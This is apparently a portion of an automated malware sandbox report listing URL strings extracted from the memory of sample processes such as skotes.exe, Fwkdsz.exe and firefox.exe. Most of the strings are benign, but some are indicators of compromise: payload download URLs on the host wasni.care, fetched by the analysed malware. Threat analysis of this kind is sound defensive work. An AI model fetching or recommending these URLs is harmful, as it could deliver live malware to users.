00000020.00000002.3341234473.00000253EF964000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2868017078.00000253EC6DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3301418861.00000253EC6D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2886154259.00000253EF940000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3315658593.00000253ED3C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2820751925.00000253F4533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: powershell.exe, 00000008.00000002.2473738158.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: powershell.exe, 00000008.00000002.2471464999.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2469949700.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                          Source: firefox.exe, 00000020.00000003.2897430854.00000253EED7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2756035227.00000253EED7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0W
                          Source: firefox.exe, 00000020.00000003.2897430854.00000253EED7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2756035227.00000253EED7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                          Source: powershell.exe, 00000008.00000002.2471464999.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: Fwkdsz.exe, 00000007.00000002.2640122155.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2471464999.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000008.00000002.2471464999.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: Fwkdsz.exe, 00000007.00000002.2640122155.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wasni.care
                          Source: skotes.exe, 00000006.00000002.2934737174.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasni.care/panel/uploads/Fwkdsz.exe
                          Source: skotes.exe, 00000006.00000002.2934737174.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wasni.care/panel/uploads/Fwkdsz.exe)
                          Source: Fwkdsz.exe, 00000007.00000002.2640122155.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wasni.care/panel/uploads/Luvzkkz.mp4
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                          Source: powershell.exe, 00000008.00000002.2471464999.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2469949700.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-update
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updatePREF_APP_UPDATE_NO_WINDOW_AUTO_RESTART_DELAY_MSBITS_IDLE_NO_PR
                          Source: firefox.exe, 00000020.00000002.3342340455.00000253EFA66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updatex
                          Source: firefox.exe, 00000020.00000003.2894963446.00000253F49DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2812464285.00000253F49DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2819189641.00000253EE883000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2898403161.00000253EE870000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2818323900.00000253EE8BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3303094848.00000253EC70E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E88AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3333605365.00000253EE876000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2920709540.00000253EE876000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E88C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E889E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2972949736.00000253E7FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: firefox.exe, 00000020.00000003.2819189641.00000253EE883000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2898403161.00000253EE870000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3333605365.00000253EE876000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2920709540.00000253EE876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
                          Source: firefox.exe, 00000020.00000002.3303094848.00000253EC716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/AppMenuNotificat
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://services-settings/RemoteSett
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2982296898.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2883030561.00000253F44B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: 24da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2883030561.00000253F44B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 00000020.00000003.2812464285.00000253F49B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                          Source: firefox.exe, 00000020.00000003.2668435370.00000253EC21F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668905912.00000253EC25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668690950.00000253EC23C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2673285399.00000253EBC85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2669234122.00000253EC277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 00000020.00000003.2885495011.00000253EF97C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.comK
                          Source: firefox.exe, 00000020.00000003.2894603584.00000253F614D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2898403161.00000253EE870000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3333605365.00000253EE890000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3333312838.00000253EE803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 00000020.00000002.3320063127.00000253ED7E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwderIdLl~
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                          Source: firefox.exe, 00000020.00000002.3213102159.00000253EBB2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.orgP
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etptoolkit.telemetry.newProfilePing.delaytoolkit.telemetry.previ
                          Source: powershell.exe, 00000008.00000002.2471464999.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                          Source: firefox.exe, 00000020.00000003.2894840440.00000253F49E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
                          Source: firefox.exe, 00000020.00000003.2894840440.00000253F49E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2896697038.00000253F03A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
                          Source: 24da741fb6.exe, 0000000B.00000003.2564360640.0000000005977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: 24da741fb6.exe, 0000000B.00000003.2564360640.0000000005977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
                          Source: firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: firefox.exe, 00000020.00000003.2668435370.00000253EC21F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668905912.00000253EC25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668690950.00000253EC23C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2669234122.00000253EC277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: firefox.exe, 00000020.00000003.2895455294.00000253F49AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3303094848.00000253EC7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA243000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
                          Source: 24da741fb6.exe, 0000000B.00000003.2564360640.0000000005977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                          Source: 24da741fb6.exe, 0000000B.00000003.2564360640.0000000005977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: firefox.exe, 00000020.00000003.2896187877.00000253F4623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/
                          Source: firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                          Source: powershell.exe, 00000008.00000002.2473738158.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000008.00000002.2473738158.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000008.00000002.2473738158.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2744719723.00000253F454B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/993268
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsUI
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
                          Source: firefox.exe, 00000020.00000002.3230698047.00000253EBC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2744719723.00000253F454B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
                          Source: 0d8313073f.exe, 0000000D.00000003.2559813189.000000000533B000.00000004.00001000.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2983236159.000000006C191000.00000002.00000001.01000000.0000001A.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000063C000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                          Source: firefox.exe, 00000020.00000003.2812464285.00000253F49E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: firefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                          Source: firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
                          Source: firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2884153672.00000253F03F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
